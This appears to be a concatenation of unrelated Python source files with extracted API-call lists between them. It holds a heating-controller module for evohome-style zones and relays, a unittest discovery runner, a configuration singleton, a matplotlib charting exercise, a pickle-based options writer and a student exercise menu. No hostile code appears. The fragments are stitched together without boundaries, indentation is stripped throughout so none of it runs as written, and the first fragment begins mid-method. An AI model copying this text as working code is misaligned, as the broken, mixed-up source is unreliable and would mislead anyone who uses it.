cmd = Command.get_zone_mode(self.id, zone_idx, priority=Priority.LOW)
self._gwy.send_cmd(cmd)
# for zone in self.zones:
# zone._discover(discover_flags=DISCOVER_PARAMS)
if msg.code in ("000A", "2309", "30C9"):
pass
# if isinstance(msg.payload, list):
# elif msg.code == "000C":
# self._msgs[f"{msg.code}"] = msg
# elif msg.code == "0005" and prev_msg is not None:
# zone_added = bool(prev_msg.code == "0004") # else zone_deleted
# elif msg.code == "30C9" and isinstance(msg.payload, list): # msg.is_array:
# find_zone_sensors()
def _get_zone(self, zone_idx, sensor=None, **kwargs) -> Zone:
"""Return a zone (will create it if required).
        Can also set a zone's sensor, zone_type, and actuators.
"""
def create_zone(zone_idx) -> Zone:
if int(zone_idx, 16) >= self._gwy.config[MAX_ZONES]:
raise ValueError(f"Invalid zone idx: {zone_idx} (exceeds max_zones)")
if zone_idx in self.zone_by_idx:
raise LookupError(f"Duplicated zone: {zone_idx} for {self}")
zone = Zone(self, zone_idx)
if not self._gwy.config[DISABLE_DISCOVERY]: # TODO: needs tidyup (ref #67)
zone._discover() # discover_flag=DISCOVER_ALL)
return zone
if zone_idx == "HW":
return super()._get_zone(zone_idx, sensor=sensor, **kwargs)
if int(zone_idx, 16) >= self._gwy.config[MAX_ZONES]:
raise ValueError(f"Unknown zone_idx/domain_id: {zone_idx}")
zone = self.zone_by_idx.get(zone_idx)
if zone is None:
zone = create_zone(zone_idx)
if kwargs.get("zone_type"):
zone._set_zone_type(kwargs["zone_type"])
if kwargs.get("actuators"): # TODO: check not an address before implmenting
for device in [d for d in kwargs["actuators"] if d not in zone.devices]:
zone.devices.append(device)
zone.device_by_id[device.id] = device
if sensor is not None:
zone._set_sensor(sensor)
return zone
@property
def _zones(self) -> dict:
return sorted(self.zones, key=lambda x: x.idx)
@property
def schema(self) -> dict:
assert ATTR_ZONES not in super().schema # TODO: removeme
return {**super().schema, ATTR_ZONES: {z.idx: z.schema for z in self._zones}}
@property
def params(self) -> dict:
assert ATTR_ZONES not in super().params # TODO: removeme
return {**super().params, ATTR_ZONES: {z.idx: z.params for z in self._zones}}
@property
def status(self) -> dict:
assert ATTR_ZONES not in super().status # TODO: removeme
return {**super().status, ATTR_ZONES: {z.idx: z.status for z in self._zones}}
class UfhSystem:
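    """Mixin that exposes the schema/params/status of any UFH controllers (device type 02)."""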
@property
def schema(self) -> dict:
assert ATTR_UFH_SYSTEM not in super().schema # TODO: removeme
return {
**super().schema,
ATTR_UFH_SYSTEM: {
d.id: d.schema for d in sorted(self._ctl.devices) if d.type == "02"
},
}
@property
def params(self) -> dict:
assert ATTR_UFH_SYSTEM not in super().params # TODO: removeme
return {
**super().params,
ATTR_UFH_SYSTEM: {
d.id: d.params for d in sorted(self._ctl.devices) if d.type == "02"
},
}
@property
def status(self) -> dict:
assert ATTR_UFH_SYSTEM not in super().status # TODO: removeme
return {
**super().status,
ATTR_UFH_SYSTEM: {
d.id: d.status for d in sorted(self._ctl.devices) if d.type == "02"
},
}
class SystemBase(Entity): # 3B00 (multi-relay)
"""The most basic controllers - a generic controller (e.g. ST9420C)."""
# 0008|0009|1030|1100|2309|3B00
def __init__(self, gwy, ctl, **kwargs) -> None:
# _LOGGER.debug("Creating a System: %s (%s)", dev_addr.id, self.__class__)
super().__init__(gwy, **kwargs)
self.id = ctl.id
gwy.systems.append(self)
gwy.system_by_id[self.id] = self
self._ctl = ctl
self._domain_id = "FF"
self._evo = None
self._heat_demand = None
self._htg_control = None
def __repr__(self) -> str:
return f"{self._ctl.id} (sys_base)"
# def __str__(self) -> str: # TODO: WIP
# return json.dumps({self._ctl.id: self.schema})
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
# super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_SCHEMA:
[ # 000C: find the HTG relay and DHW sensor, if any (DHW relays in DHW)
self._send_cmd("000C", payload=dev_type)
for dev_type in ("000D", "000F") # CODE_000C_DEVICE_TYPE
# for dev_type, description in CODE_000C_DEVICE_TYPE.items() fix payload
# if description is not None
]
if discover_flag & DISCOVER_PARAMS:
self._send_cmd("1100", payload="FC") # TPI params
# # for code in ("3B00",): # 3EF0, 3EF1
# # for payload in ("0000", "00", "F8", "F9", "FA", "FB", "FC", "FF"):
# # self._send_cmd(code, payload=payload)
# # TODO: opentherm: 1FD4, 22D9, 3220
# if discover_flag & DISCOVER_PARAMS:
# for domain_id in range(0xF8, 0x100):
# self._send_cmd("0009", payload=f"{domain_id:02X}00")
if discover_flag & DISCOVER_STATUS:
# for domain_id in range(0xF8, 0x100):
# self._send_cmd("0008", payload=f"{domain_id:02X}00")
pass
def _handle_msg(self, msg) -> bool:
        def OUT_is_exchange(this, prev): # TODO: use is?
return this.src is prev.dst and this.dst is prev.src.addr
def OUT_find_htg_relay(this, prev=None):
"""Discover the heat relay (10: or 13:) for this system.
            There are 3 ways to find a controller's heat relay (in order of reliability):
1. The 3220 RQ/RP *to/from a 10:* (1x/5min)
2a. The 3EF0 RQ/RP *to/from a 10:* (1x/1min)
2b. The 3EF0 RQ (no RP) *to a 13:* (3x/60min)
3. The 3B00 I/I exchange between a CTL & a 13: (TPI cycle rate, usu. 6x/hr)
            Data from the CTL is considered 'authoritative'. The 1FC9 RQ/RP exchange
to/from a CTL is too rare to be useful.
"""
# 18:14:14.025 066 RQ --- 01:078710 10:067219 --:------ 3220 005 0000050000
# 18:14:14.446 065 RP --- 10:067219 01:078710 --:------ 3220 005 00C00500FF
# 14:41:46.599 064 RQ --- 01:078710 10:067219 --:------ 3EF0 001 00
# 14:41:46.631 063 RP --- 10:067219 01:078710 --:------ 3EF0 006 0000100000FF # noqa
# 06:49:03.465 045 RQ --- 01:145038 13:237335 --:------ 3EF0 001 00
# 06:49:05.467 045 RQ --- 01:145038 13:237335 --:------ 3EF0 001 00
# 06:49:07.468 045 RQ --- 01:145038 13:237335 --:------ 3EF0 001 00
# 09:03:59.693 051 I --- 13:237335 --:------ 13:237335 3B00 002 00C8
# 09:04:02.667 045 I --- 01:145038 --:------ 01:145038 3B00 002 FCC8
# note the order: most to least reliable
heater = None
if this.code == "3220" and this.verb == "RQ":
if this.src is self and this.dst.type == "10":
heater = this.dst
elif this.code == "3EF0" and this.verb == "RQ":
if this.src is self and this.dst.type in ("10", "13"):
heater = this.dst
elif this.code == "3B00" and this.verb == " I" and prev is not None:
if prev.code == this.code and prev.verb == this.verb:
if this.src is self and prev.src.type == "13":
heater = prev.src
if heater is not None:
self._set_htg_control(heater)
if msg.code in ("000A", "2309", "30C9") and not isinstance(msg.payload, list):
pass
else:
super()._handle_msg(msg)
if msg.code == "0008" and msg.verb in (" I", "RP"):
if "domain_id" in msg.payload:
self._relay_demands[msg.payload["domain_id"]] = msg
if msg.payload["domain_id"] == "F9":
device = self.dhw.heating_valve if self.dhw else None
elif msg.payload["domain_id"] == "FA":
device = self.dhw.hotwater_valve if self.dhw else None
elif msg.payload["domain_id"] == "FC":
device = self.heating_control
else:
device = None
if False and device is not None: # TODO: FIXME
qos = {"priority": Priority.LOW, "retries": 2}
for code in ("0008", "3EF1"):
device._send_cmd(code, qos)
if msg.code == "3150" and msg.verb in (" I", "RP"):
if "domain_id" in msg.payload and msg.payload["domain_id"] == "FC":
self._heat_demand = msg.payload
# if msg.code in ("3220", "3B00", "3EF0"): # self.heating_control is None and
# find_htg_relay(msg, prev=prev_msg)
def _send_cmd(self, code, **kwargs) -> None:
dest = kwargs.pop("dest_addr", self._ctl.id)
payload = kwargs.pop("payload", "00")
super()._send_cmd(code, dest, payload, **kwargs)
@property
def devices(self) -> List[Device]:
return self._ctl.devices + [self._ctl] # TODO: to sort out
@property
def heating_control(self) -> Device:
if self._htg_control:
return self._htg_control
htg_control = [d for d in self._ctl.devices if d._domain_id == "FC"]
return htg_control[0] if len(htg_control) == 1 else None # HACK for 10:
def _set_htg_control(self, device: Device) -> None: # self._htg_control
"""Set the heating control relay for this system (10: or 13:)."""
if not isinstance(device, Device) or device.type not in ("10", "13"):
raise TypeError(f"{ATTR_HTG_CONTROL} can't be: {device}")
if self._htg_control is not None:
if self._htg_control is device:
return
raise CorruptStateError(
f"{ATTR_HTG_CONTROL} shouldn't change: {self._htg_control} to {device}"
)
# if device.evo is not None and device.evo is not self:
# raise LookupError
if self._htg_control is None:
self._htg_control = device
device._set_parent(self, domain="FC")
@property
def tpi_params(self) -> Optional[float]: # 1100
return self._get_msg_value("1100")
@property
def heat_demand(self) -> Optional[float]: # 3150/FC
if self._heat_demand:
return self._heat_demand["heat_demand"]
@property
def is_calling_for_heat(self) -> Optional[bool]:
"""Return True is the system is currently calling for heat."""
if not self._htg_control:
return
if self._htg_control.actuator_state:
return True
@property
def schema(self) -> dict:
"""Return the system's schema."""
schema = {ATTR_CONTROLLER: self._ctl.id, ATTR_HTG_SYSTEM: {}}
assert ATTR_HTG_SYSTEM in schema # TODO: removeme
assert ATTR_HTG_CONTROL not in schema[ATTR_HTG_SYSTEM] # TODO: removeme
schema[ATTR_HTG_SYSTEM][ATTR_HTG_CONTROL] = (
self.heating_control.id if self.heating_control else None
)
assert ATTR_ORPHANS not in schema[ATTR_HTG_SYSTEM] # TODO: removeme
schema[ATTR_ORPHANS] = sorted(
[d.id for d in self._ctl.devices if not d._domain_id and d.type != "02"]
        ) # devices without a parent zone; NB: the CTL can be a sensor for a zone
# TODO: where to put this?
# assert "devices" not in schema # TODO: removeme
# schema["devices"] = {d.id: d.device_info for d in sorted(self._ctl.devices)}
return schema
@property
def params(self) -> dict:
"""Return the system's configuration."""
params = {ATTR_HTG_SYSTEM: {}}
assert ATTR_HTG_SYSTEM in params # TODO: removeme
# devices don't have params
# assert ATTR_HTG_CONTROL not in params[ATTR_HTG_SYSTEM] # TODO: removeme
# params[ATTR_HTG_SYSTEM][ATTR_HTG_CONTROL] = (
# self.heating_control.params if self.heating_control else None
# )
assert "tpi_params" not in params[ATTR_HTG_SYSTEM] # TODO: removeme
params[ATTR_HTG_SYSTEM]["tpi_params"] = (
self.heating_control._get_msg_value("1100")
if self.heating_control
else None
)
return params
@property
def status(self) -> dict:
"""Return the system's current state."""
status = {ATTR_HTG_SYSTEM: {}}
assert ATTR_HTG_SYSTEM in status # TODO: removeme
# assert ATTR_HTG_CONTROL not in status[ATTR_HTG_SYSTEM] # TODO: removeme
# status[ATTR_HTG_SYSTEM][ATTR_HTG_CONTROL] = (
# self.heating_control.status if self.heating_control else None
# )
status[ATTR_HTG_SYSTEM]["heat_demand"] = self.heat_demand
status[ATTR_DEVICES] = {d.id: d.status for d in sorted(self._ctl.devices)}
return status
class System(StoredHw, SysDatetime, SystemBase): # , SysFaultLog
"""The Controller class."""
def __init__(self, gwy, ctl, **kwargs) -> None:
super().__init__(gwy, ctl, **kwargs)
self._heat_demands = {}
self._relay_demands = {}
self._relay_failsafes = {}
def __repr__(self) -> str:
return f"{self._ctl.id} (system)"
def _handle_msg(self, msg) -> bool:
super()._handle_msg(msg)
if "domain_id" in msg.payload:
idx = msg.payload["domain_id"]
if msg.code == "0008":
self._relay_demands[idx] = msg
elif msg.code == "0009":
self._relay_failsafes[idx] = msg
elif msg.code == "3150":
self._heat_demands[idx] = msg
elif msg.code not in ("0001", "000C", "0418", "1100", "3B00"):
assert False, msg.code
@property
def heat_demands(self) -> Optional[dict]: # 3150
if self._heat_demands:
return {k: v.payload["heat_demand"] for k, v in self._heat_demands.items()}
@property
def relay_demands(self) -> Optional[dict]: # 0008
if self._relay_demands:
return {
k: v.payload["relay_demand"] for k, v in self._relay_demands.items()
}
@property
def relay_failsafes(self) -> Optional[dict]: # 0009
if self._relay_failsafes:
return {} # failsafe_enabled
@property
def status(self) -> dict:
"""Return the system's current state."""
status = super().status
assert ATTR_HTG_SYSTEM in status # TODO: removeme
status[ATTR_HTG_SYSTEM]["heat_demands"] = self.heat_demands
status[ATTR_HTG_SYSTEM]["relay_demands"] = self.relay_demands
status[ATTR_HTG_SYSTEM]["relay_failsafes"] = self.relay_failsafes
return status
class Evohome(SysLanguage, SysMode, MultiZone, UfhSystem, System): # evohome
# class Evohome(System): # evohome
"""The Evohome system - some controllers are evohome-compatible."""
def __init__(self, gwy, ctl, **kwargs) -> None:
super().__init__(gwy, ctl, **kwargs)
def __repr__(self) -> str:
return f"{self._ctl.id} (evohome)"
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
self._send_cmd("1F09")
def _handle_msg(self, msg) -> bool:
super()._handle_msg(msg)
# def xxx(zone_dict):
# zone = self.zone_by_idx[zone_dict.pop("zone_idx")]
# if msg.code == "000A":
# zone._zone_config = zone_dict
# elif msg.code == "2309":
# zone._temp = zone_dict
# elif msg.code == "30C9":
# zone._temp = zone_dict
# if msg.code in ("000A", "2309", "30C9"):
# if isinstance(msg.payload, list):
# super()._handle_msg(msg)
# [xxx(z) for z in msg.payload]
# else:
# xxx(msg.payload)
if msg.code in ("000A", "2309", "30C9") and isinstance(msg.payload, list):
pass
class Chronotherm(Evohome):
def __repr__(self) -> str:
return f"{self._ctl.id} (chronotherm)"
class Hometronics(System):
RQ_SUPPORTED = ("0004", "000C", "2E04", "313F") # TODO: WIP
RQ_UNSUPPORTED = ("xxxx",) # 10E0?
def __repr__(self) -> str:
return f"{self._ctl.id} (hometronics)"
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
# super()._discover(discover_flag=discover_flag)
# will RP to: 0005/configured_zones_alt, but not: configured_zones
# will RP to: 0004
if discover_flag & DISCOVER_STATUS:
self._send_cmd("1F09")
class Programmer(Evohome):
def __repr__(self) -> str:
return f"{self._ctl.id} (programmer)"
class Sundial(Evohome):
def __repr__(self) -> str:
return f"{self._ctl.id} (sundial)"
SYSTEM_CLASSES = {
SystemType.CHRONOTHERM: Chronotherm,
SystemType.EVOHOME: Evohome,
SystemType.HOMETRONICS: Hometronics,
SystemType.PROGRAMMER: Programmer,
SystemType.SUNDIAL: Sundial,
SystemType.GENERIC: System,
}
| [
"threading.Lock",
"datetime.timedelta",
"logging.getLogger"
] | [((859, 886), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (876, 886), False, 'import logging\n'), ((11388, 11394), 'threading.Lock', 'Lock', ([], {}), '()\n', (11392, 11394), False, 'from threading import Lock\n'), ((13353, 13369), 'datetime.timedelta', 'td', ([], {'seconds': 'secs'}), '(seconds=secs)\n', (13355, 13369), True, 'from datetime import timedelta as td\n')] |
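
A rough, illustrative sketch of how the SYSTEM_CLASSES table above might be consumed: pick a concrete class from a controller's advertised system type and fall back to the generic System. The create_system wrapper and the profile argument are assumptions for illustration, not part of the original module.

def create_system(gwy, ctl, profile=None):
    # Look up a concrete class by SystemType; default to the generic System.
    cls = SYSTEM_CLASSES.get(profile, System)
    # Every class registered above shares the (gwy, ctl, **kwargs) constructor.
    return cls(gwy, ctl)
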
import argparse
import unittest
import os
import importlib
import sys
from gmc.conf import settings, ENVIRONMENT_VARIABLE
from gmc.core import handler
def build_suite(test_labels=None):
suite = unittest.TestSuite()
test_loader = unittest.defaultTestLoader
test_labels = test_labels or ['.']
discover_kwargs = {}
for label in test_labels:
kwargs = discover_kwargs.copy()
tests = None
label_as_path = os.path.abspath(label)
# if a module, or "module.ClassName[.method_name]", just run those
if not os.path.exists(label_as_path):
tests = test_loader.loadTestsFromName(label)
elif os.path.isdir(label_as_path):
top_level = label_as_path
while True:
init_py = os.path.join(top_level, '__init__.py')
if os.path.exists(init_py):
try_next = os.path.dirname(top_level)
if try_next == top_level:
# __init__.py all the way down? give up.
break
top_level = try_next
continue
break
kwargs['top_level_dir'] = top_level
if not (tests and tests.countTestCases()) and is_discoverable(label):
# Try discovery if path is a package or directory
tests = test_loader.discover(start_dir=label, **kwargs)
# Make unittest forget the top-level dir it calculated from this
# run, to support running tests from two different top-levels.
test_loader._top_level_dir = None
suite.addTests(tests)
return suite
def is_discoverable(label):
"""
Check if a test label points to a python package or file directory.
Relative labels like "." and ".." are seen as directories.
"""
try:
mod = importlib.import_module(label)
except (ImportError, TypeError):
pass
else:
return hasattr(mod, '__path__')
return os.path.isdir(os.path.abspath(label))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'modules', nargs='*',
help='Optional path(s) to test modules; e.g. "test_settings" or '
'"test_settings.tests.TestSettings.test_settings_loader".',
)
parser.add_argument('--settings', help='Test gmc with different settings file')
args = parser.parse_args()
if args.settings:
handler.execute_from_command_line(['', args.settings], quiet=True)
os.environ['DUMMY'] = "FALSE"
else:
os.environ[ENVIRONMENT_VARIABLE] = 'setting'
os.environ['DUMMY'] = "TRUE"
args.modules = [os.path.normpath(labels) for labels in args.modules]
suite = build_suite(args.modules)
runner = unittest.TextTestRunner()
runner.run(suite) | [
"os.path.abspath",
"gmc.core.handler.execute_from_command_line",
"unittest.TextTestRunner",
"importlib.import_module",
"argparse.ArgumentParser",
"unittest.TestSuite",
"os.path.isdir",
"os.path.dirname",
"os.path.exists",
"os.path.normpath",
"os.path.join"
] | [((200, 220), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (218, 220), False, 'import unittest\n'), ((2082, 2107), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2105, 2107), False, 'import argparse\n'), ((2792, 2817), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {}), '()\n', (2815, 2817), False, 'import unittest\n'), ((446, 468), 'os.path.abspath', 'os.path.abspath', (['label'], {}), '(label)\n', (461, 468), False, 'import os\n'), ((1860, 1890), 'importlib.import_module', 'importlib.import_module', (['label'], {}), '(label)\n', (1883, 1890), False, 'import importlib\n'), ((2017, 2039), 'os.path.abspath', 'os.path.abspath', (['label'], {}), '(label)\n', (2032, 2039), False, 'import os\n'), ((2462, 2528), 'gmc.core.handler.execute_from_command_line', 'handler.execute_from_command_line', (["['', args.settings]"], {'quiet': '(True)'}), "(['', args.settings], quiet=True)\n", (2495, 2528), False, 'from gmc.core import handler\n'), ((2688, 2712), 'os.path.normpath', 'os.path.normpath', (['labels'], {}), '(labels)\n', (2704, 2712), False, 'import os\n'), ((559, 588), 'os.path.exists', 'os.path.exists', (['label_as_path'], {}), '(label_as_path)\n', (573, 588), False, 'import os\n'), ((660, 688), 'os.path.isdir', 'os.path.isdir', (['label_as_path'], {}), '(label_as_path)\n', (673, 688), False, 'import os\n'), ((778, 816), 'os.path.join', 'os.path.join', (['top_level', '"""__init__.py"""'], {}), "(top_level, '__init__.py')\n", (790, 816), False, 'import os\n'), ((836, 859), 'os.path.exists', 'os.path.exists', (['init_py'], {}), '(init_py)\n', (850, 859), False, 'import os\n'), ((892, 918), 'os.path.dirname', 'os.path.dirname', (['top_level'], {}), '(top_level)\n', (907, 918), False, 'import os\n')] |
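
For reference, a minimal sketch of driving the discovery helper above from another script rather than the command line. The module name run_tests is an assumption (the original filename is not shown); "test_settings" is the example label quoted in the script's own help text.

import unittest
from run_tests import build_suite   # assumed module name for the script above

suite = build_suite(["test_settings"])  # discovers and loads the labelled tests
unittest.TextTestRunner().run(suite)
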
# -*- coding: utf-8 -*-
""" Singleton class to manage configuration
Description:
Todo:
"""
import json
import os
import sys
import logging
import constant
class Config(object):
# Here will be the instance stored.
__instance = None
@classmethod
def getInstance(cls):
""" Static access method. """
        if Config.__instance is None:
            raise Exception("No configuration has been initialized yet!")
return Config.__instance
def __init__(self, url):
""" Virtually private constructor. """
        if Config.__instance is not None:
raise Exception("This class is a singleton!")
else:
self.config = dict()
self.load(url)
self._url = url
Config.__instance = self
def load(self, url):
try:
self.config = json.load(open(url))
self.config["version"] = constant.APPVERSION
logging.info(self.config)
except Exception as error:
logging.error(error, exc_info=True)
return self.config
def store(self):
try:
with open(self._url, "w") as outfile:
json.dump(self.config, outfile, indent=4)
except Exception as error:
logging.error(error, exc_info=True)
| [
"json.dump",
"logging.info",
"logging.error"
] | [((936, 961), 'logging.info', 'logging.info', (['self.config'], {}), '(self.config)\n', (948, 961), False, 'import logging\n'), ((1009, 1044), 'logging.error', 'logging.error', (['error'], {'exc_info': '(True)'}), '(error, exc_info=True)\n', (1022, 1044), False, 'import logging\n'), ((1173, 1214), 'json.dump', 'json.dump', (['self.config', 'outfile'], {'indent': '(4)'}), '(self.config, outfile, indent=4)\n', (1182, 1214), False, 'import json\n'), ((1262, 1297), 'logging.error', 'logging.error', (['error'], {'exc_info': '(True)'}), '(error, exc_info=True)\n', (1275, 1297), False, 'import logging\n')] |
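
A minimal usage sketch of the Config singleton above: construct it exactly once with a path, then read it anywhere via getInstance(). The path "config.json" and the "last_run" key are placeholders for illustration.

cfg = Config("config.json")                     # first (and only) construction loads the file
print(Config.getInstance().config["version"])  # "version" is injected by load()
cfg.config["last_run"] = "today"               # hypothetical key added by the caller
cfg.store()                                    # writes the dict back to the same file
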
##
## Plotting with Matplotlib
## ===========================================================================
##
## Build a chart similar to the one shown in the file `original.png`
## using the file `data.csv`. The generated chart must be saved to the
## file `generada.png`.
##
## Save the figure to disk with:
##
##     plt.savefig('generada.png')
##
## >>> Write your code from this point on <<<
##
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
df = pd.read_csv('data.csv', sep=',')
data = df.groupby('Region').sum()[['Poblacion 0-14', 'Poblacion 15-64', 'Poblacion 65+']]
fig, axs = plt.subplots(1, 6, sharex='col', sharey='row', figsize=(13,6), dpi=72);
plt.subplots_adjust(wspace = 0.1, hspace=0.1)
plt.setp(axs[0], ylabel='Poblacion')
for index, region in enumerate(data.index):
axs[index].bar(range(3), data.iloc[index,:], color=['tab:orange', 'tab:blue', 'tab:green'])
for n, ax in enumerate(axs):
ax.set_xticks(range(3));
ax.set_xticklabels(data.columns, rotation=90);
ax.set_title(data.index[n]);
plt.tight_layout()
plt.savefig('generada.png'); | [
"pandas.read_csv",
"matplotlib.pyplot.setp",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.savefig"
] | [((539, 571), 'pandas.read_csv', 'pd.read_csv', (['"""data.csv"""'], {'sep': '""","""'}), "('data.csv', sep=',')\n", (550, 571), True, 'import pandas as pd\n'), ((675, 746), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(6)'], {'sharex': '"""col"""', 'sharey': '"""row"""', 'figsize': '(13, 6)', 'dpi': '(72)'}), "(1, 6, sharex='col', sharey='row', figsize=(13, 6), dpi=72)\n", (687, 746), True, 'import matplotlib.pyplot as plt\n'), ((747, 790), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'wspace': '(0.1)', 'hspace': '(0.1)'}), '(wspace=0.1, hspace=0.1)\n', (766, 790), True, 'import matplotlib.pyplot as plt\n'), ((793, 829), 'matplotlib.pyplot.setp', 'plt.setp', (['axs[0]'], {'ylabel': '"""Poblacion"""'}), "(axs[0], ylabel='Poblacion')\n", (801, 829), True, 'import matplotlib.pyplot as plt\n'), ((1109, 1127), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1125, 1127), True, 'import matplotlib.pyplot as plt\n'), ((1128, 1155), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""generada.png"""'], {}), "('generada.png')\n", (1139, 1155), True, 'import matplotlib.pyplot as plt\n')] |
#!/usr/bin/env python
# Written by: DGC
#
#D This is purely for developer use, it will not be included in the program it
#D is just for adding/changing options in the standard Options.pickle file.
#
# python imports
from __future__ import unicode_literals
import os
import csv
import pickle
import sys
import re
# local imports
OPTIONS = {
"code_css": "Standard",
"code_css_class": "highlight",
"show_html": False,
"processor": "markdown_all",
"markdown_css": "Markdown",
"display_line_numbers": False,
"font": "Arial,12,-1,5,50,0,0,0,0,0",
}
LOCALISATION_OPTIONS = {
"language": "en_GB",
"available_languages": ["en_GB", "de_DE", "en_AU", "en_US", "fr_FR"],
}
TEST_OPTIONS = {
"code_css": "",
"code_css_class": "highlight",
"show_html": False,
"processor": "markdown_all",
"markdown_css": "",
"display_line_numbers": False,
"font": "Arial,12,-1,5,50,0,0,0,0,0",
# "language": "en_GB",
}
#==============================================================================
def write_config_file(object, file_name, directory="Resources"):
"""
Pickles the object to file_name where file_name is a relative path under
Resources
"""
options_path = os.path.join(
os.path.dirname(sys.argv[0]),
"../" + directory
)
file_path = os.path.join(options_path, file_name)
with open(file_path, "wb") as options_file:
pickle.dump(object, options_file)
#==============================================================================
def write_options_files():
write_config_file(OPTIONS, "Options.pickle")
write_config_file(
LOCALISATION_OPTIONS,
"Languages.pickle",
directory="Resources/Languages"
)
write_config_file(TEST_OPTIONS, "Options.pickle", directory="Integration")
#==============================================================================
def verify_keys(file_name, keys, verifier):
keys = set(keys)
verifier = set(verifier)
difference = [k for k in keys if k not in verifier]
if (difference):
raise Exception(
"Bad key found in %s: %s" %(file_name, str(difference))
)
#==============================================================================
def write_user_strings(file_name, verifier):
with open("data/" + file_name + ".csv", "rb") as csvfile:
table = csv.reader(csvfile)
for i, row in enumerate(table):
if (i == 0):
keys = row[1:]
verify_keys(file_name, keys, verifier)
continue
language = row[0]
user_text = dict(zip(keys, row[1:]))
write_config_file(
user_text,
file_name + ".pickle",
directory="Resources/Languages/" + language)
#==============================================================================
def generate_keys(pattern):
keys = list()
for path in os.listdir("."):
if (path[-3:] == ".py"):
with open(path, "r") as py_file:
lines = py_file.readlines()
for line in lines:
if (pattern.lower() in line.lower()):
match = re.search(".*" + pattern + "\[\"(.*)\"\]", line)
if match:
keys.append(match.group(1))
return keys
#==============================================================================
def generate_user_text_keys():
return generate_keys("USER_TEXT")
#==============================================================================
def generate_tool_tips_keys():
return generate_keys("TOOL_TIP")
#==============================================================================
def write_user_text():
write_user_strings("UserText", generate_user_text_keys())
#==============================================================================
def write_tool_tips():
write_user_strings("ToolTips", generate_tool_tips_keys())
#==============================================================================
if (__name__ == "__main__"):
write_options_files()
write_user_text()
write_tool_tips()
| [
"pickle.dump",
"csv.reader",
"os.path.dirname",
"re.search",
"os.path.join",
"os.listdir"
] | [((1345, 1382), 'os.path.join', 'os.path.join', (['options_path', 'file_name'], {}), '(options_path, file_name)\n', (1357, 1382), False, 'import os\n'), ((2979, 2994), 'os.listdir', 'os.listdir', (['"""."""'], {}), "('.')\n", (2989, 2994), False, 'import os\n'), ((1263, 1291), 'os.path.dirname', 'os.path.dirname', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (1278, 1291), False, 'import os\n'), ((1439, 1472), 'pickle.dump', 'pickle.dump', (['object', 'options_file'], {}), '(object, options_file)\n', (1450, 1472), False, 'import pickle\n'), ((2402, 2421), 'csv.reader', 'csv.reader', (['csvfile'], {}), '(csvfile)\n', (2412, 2421), False, 'import csv\n'), ((3231, 3279), 're.search', 're.search', (['(\'.*\' + pattern + \'\\\\["(.*)"\\\\]\')', 'line'], {}), '(\'.*\' + pattern + \'\\\\["(.*)"\\\\]\', line)\n', (3240, 3279), False, 'import re\n')] |
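
To make the key-extraction step above concrete: generate_keys() scans each .py file for subscript accesses of the given name and captures the quoted key. A small self-contained illustration of the same regex; the example line and the key name are hypothetical.

import re

line = 'title.setText(USER_TEXT["window_title"])'   # hypothetical line from a scanned .py file
match = re.search(r'.*USER_TEXT\["(.*)"\]', line)
print(match.group(1))                              # -> window_title
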
import os
clear = lambda: os.system('clear')
clear()
opcao = 1
while(opcao != 0):
    print("PARADIGMS assignment")
    print(" 1 - QUESTION 01")
    print(" 2 - QUESTION 02")
    print(" 3 - QUESTION 03")
    print(" 4 - QUESTION 04")
    print(" 5 - QUESTION 05")
    print(" 0 - TO EXIT")
    print("")
    opcao = int(input("Enter your choice: "))
    clear()
    if(opcao == 1):
        print("OLDEST PERSON")
        print("Enter the first person's name: ")
        p1 = input("Name: ")
        i1 = int(input("Age: "))
        print("Enter the second person's name: ")
        p2 = input("Name: ")
        i2 = int(input("Age: "))
        if(i1 > i2):
            print("oldest person: {}".format(p1))
        else:
            print("oldest person: {}".format(p2))
        print("")
    elif(opcao == 2):
        print("AVERAGE SALARY")
        print("Enter the first employee's name: ")
        p1 = input("Name: ")
        s1 = float(input("Salary: "))
        print("Enter the second employee's name: ")
        p2 = input("Name: ")
        s2 = float(input("Salary: "))
        media = (s1 + s2) / 2
        print("Average salary = {}".format(media))
        print("")
    elif(opcao == 3):
        from retangulo import Retangulo
        print("WIDTH AND HEIGHT OF A RECTANGLE")
        print("Enter the width and height of the rectangle: ")
        L1 = float(input("Width: "))
        A1 = float(input("Height: "))
        retangulo = Retangulo(A1,L1)
        area = retangulo.Area(A1,L1)
        perimetro = retangulo.Perimetro(A1, L1)
        diagonal = retangulo.Diagonal(A1, L1)
        print("Area: {}".format(area))
        print("Perimeter: {}".format(perimetro))
        print("Diagonal: {}".format(diagonal))
        print("")
    elif(opcao == 4):
        from funcionario import Funcionario
        print("DATA UPDATE")
        print("Enter an employee")
        nome = input("Name: ")
        salario = float(input("Salary: "))
        imposto = float(input("Tax: "))
        funcionario1 = Funcionario(nome, salario, imposto)
        liquido = funcionario1.SalarioLiquido(salario, imposto)
        print(" ")
        print("Employee: {} , R$ {}".format(nome, liquido))
        comis = float(input("Enter the percentage to raise the salary: "))
        aument = funcionario1.AumentoSalario(salario, liquido, comis)
        print("Updated data: {} R$ {}".format(nome, aument))
        print("")
    elif(opcao == 5):
        print("PASSED OR FAILED")
        nome = input("Student name: ")
        nota1 = float(input("First grade: "))
        nota2 = float(input("Second grade: "))
        nota3 = float(input("Third grade: "))
        notas = (nota1 + nota2 + nota3)
        print("")
        vb = 60.0
        vr = vb - notas
        if(notas >= vb):
            print("Final grade = {:.2f}".format(notas))
            print("Passed")
        else:
            print("Final grade = {:.2f}".format(notas))
            print("Failed")
            print("Short by {:.2f} points".format(vr))
        print("")
